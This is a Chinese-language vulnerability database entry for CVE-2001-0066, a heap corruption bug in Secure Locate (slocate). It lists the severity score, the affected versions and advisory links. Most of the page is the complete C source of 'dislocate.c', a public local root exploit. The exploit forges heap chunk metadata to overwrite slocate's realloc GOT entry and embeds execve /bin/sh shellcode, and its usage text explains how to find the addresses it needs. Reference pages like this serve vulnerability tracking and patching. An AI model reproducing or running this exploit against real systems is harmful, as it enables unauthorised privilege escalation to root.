CVE-2001-0066
CVSS7.2
发布时间 :2001-02-16 00:00:00
修订时间 :2008-09-05 16:23:11
NMCOE    

[原文]Secure Locate (slocate) allows local users to corrupt memory via a malformed database file that specifies an offset value that accesses memory outside of the intended buffer.


[CNNVD]Secure Locate (slocate)漏洞(CNNVD-200102-084)

        Secure Locate (slocate)存在漏洞。本地用户借助畸形的说明在预期缓冲区外访问内存的补偿值的数据库文件损坏内存。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:kevin_lindsay:secure_locate:2.2
cpe:/a:kevin_lindsay:secure_locate:1.5
cpe:/a:kevin_lindsay:secure_locate:2.0
cpe:/a:kevin_lindsay:secure_locate:2.1
cpe:/a:kevin_lindsay:secure_locate:1.4
cpe:/a:kevin_lindsay:secure_locate:1.6

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0066
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0066
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200102-084
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/2004
(VENDOR_ADVISORY)  BID  2004
http://archives.neohapsis.com/archives/bugtraq/2000-11/0356.html
(VENDOR_ADVISORY)  BUGTRAQ  20001126 [MSY] S(ecure)Locate heap corruption vulnerability
http://xforce.iss.net/static/5594.php
(UNKNOWN)  XF  slocate-heap-execute-code(5594)
http://www.turbolinux.com/pipermail/tl-security-announce/2001-February/000144.html
(UNKNOWN)  TURBO  TLSA2001002-1
http://www.redhat.com/support/errata/RHSA-2000-128.html
(UNKNOWN)  REDHAT  RHSA-2000:128
http://www.linux-mandrake.com/en/security/2000/MDKSA-2000-085.php3
(UNKNOWN)  MANDRAKE  MDKSA-2000:085
http://www.debian.org/security/2000/20001217a
(UNKNOWN)  DEBIAN  DSA-005-1
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000369
(UNKNOWN)  CONECTIVA  CLA-2001:369

- 漏洞信息

Secure Locate (slocate)漏洞
高危 未知
2001-02-16 00:00:00 2005-05-02 00:00:00
本地  
        Secure Locate (slocate)存在漏洞。本地用户借助畸形的说明在预期缓冲区外访问内存的补偿值的数据库文件损坏内存。

- 公告与补丁

        

- 漏洞信息 (216)

dislocate - Local i386 exploit in v1.3 (EDBID:216)
linux local
2000-12-02 Verified
0 Michel Kaempf
N/A [点击下载]
/*
 * MasterSecuritY <www.mastersecurity.fr>
 *
 * dislocate.c - Local i386 exploit in v1.3 < Secure Locate < v2.3
 * Copyright (C) 2000  Michel "MaXX" Kaempf <maxx@mastersecurity.fr>
 *
 * Updated versions of this exploit and the corresponding advisory will
 * be made available at:
 *
 * ftp://maxx.via.ecp.fr/dislocate/
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#define PATH "/tmp/path"

char *shellcode =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

void usage( char * string )
{
  fprintf( stderr, "* Usage: %s filename realloc malloc\n", string );
  fprintf( stderr, "\n" );
  fprintf( stderr, "* Example: %s /usr/bin/slocate 0x0804e7b0 0x08050878\n", string );
  fprintf( stderr, "\n" );
  fprintf( stderr, "* Realloc:\n" );
  fprintf( stderr, "  $ objdump -R /usr/bin/slocate | grep realloc\n" );
  fprintf( stderr, "\n" );
  fprintf( stderr, "* Malloc:\n" );
  fprintf( stderr, "  $ %s foobar 0x12121212 0x42424242\n", string );
  fprintf( stderr, "  $ cp /usr/bin/slocate /tmp\n" );
  fprintf( stderr, "  $ ltrace /tmp/slocate -d %s foobar 2>&1 | grep 'malloc(64)'\n", PATH );
  fprintf( stderr, "  $ rm %s\n", PATH );
  fprintf( stderr, "\n" );
}

int zero( unsigned int ui )
{
  if ( !(ui & 0xff000000) || !(ui & 0x00ff0000) || !(ui & 0x0000ff00) || !(ui & 0x000000ff) ) {
    return( -1 );
  }
  return( 0 );
}

int main( int argc, char * argv[] )
{
  unsigned int ui_realloc;
  unsigned int ui_malloc;
  char path[1337];
  char next[1337];
  char * execve_argv[] = { NULL, "-d", PATH, next, NULL };
  int fd;
  unsigned int p_next;
  unsigned int ui;

  if ( argc != 4 ) {
    usage( argv[0] );
    return( -1 );
  }
  execve_argv[0] = argv[1];
  ui_realloc = (unsigned int)strtoul( argv[2], NULL, 0 );
  ui_malloc = (unsigned int)strtoul( argv[3], NULL, 0 );

  strcpy( next, "ppppssssffffbbbb" );
  p_next = (0xc0000000 - 4) - (strlen(execve_argv[0]) + 1) - (strlen(next) + 1);
  for ( ui = 0; ui < p_next - (p_next & ~3); ui++ ) {
    strcat( next, "X" );
  }
  p_next = (0xc0000000 - 4) - (strlen(execve_argv[0]) + 1) - (strlen(next) + 1);

  ui = 0;
  *((unsigned int *)(&(next[ui]))) = (unsigned int)(-1);

  ui += 4;
  *((unsigned int *)(&(next[ui]))) = ((ui_malloc - 8) + 136) - p_next;
  if ( zero( *((unsigned int *)(&(next[ui]))) ) ) {
    fprintf( stderr, "debug: next->size == 0x%08x;\n", *((unsigned int *)(&(next[ui]))) );
    return( -1 );
  }

  ui += 4;
  *((unsigned int *)(&(next[ui]))) = ui_realloc - 12;
  if ( zero( *((unsigned int *)(&(next[ui]))) ) ) {
    fprintf( stderr, "debug: next->fd == 0x%08x;\n", *((unsigned int *)(&(next[ui]))) );
    return( -1 );
  }

  ui += 4;
  *((unsigned int *)(&(next[ui]))) = ui_malloc;
  if ( zero( *((unsigned int *)(&(next[ui]))) ) ) {
    fprintf( stderr, "debug: next->bk == 0x%08x;\n", *((unsigned int *)(&(next[ui]))) );
    return( -1 );
  }

  ui = 0;
  path[ui] = (char)(256 - 4);

  ui += 1;
  *((unsigned int *)(&(path[ui]))) = p_next - (ui_malloc - 8);
  if ( zero( *((unsigned int *)(&(path[ui]))) ) ) {
    fprintf( stderr, "debug: oldp->size == 0x%08x;\n", *((unsigned int *)(&(path[ui]))) );
    return( -1 );
  }

  ui += 4;
  path[ui] = 0;
  strcat( path, "\xeb\x0axxyyyyzzzz" );
  strcat( path, shellcode );

  fd = open( PATH, O_WRONLY|O_CREAT|O_EXCL, S_IRWXU );
  if ( fd == -1 ) {
    fprintf( stderr, "debug: open( \"%s\", O_WRONLY|O_CREAT|O_EXCL, S_IRWXU ) == -1;\n", PATH );
    return( -1 );
  }
  write( fd, "0", sizeof("0") );
  write( fd, "", sizeof("") );
  write( fd, path, strlen(path) );
  close( fd );

  execve( execve_argv[0], execve_argv, NULL );
  return( -1 );
}


// milw0rm.com [2000-12-02]
		

- 漏洞信息

1664
Secure Locate (slocate) Malformed Database Heap Corruption
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2000-11-26 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站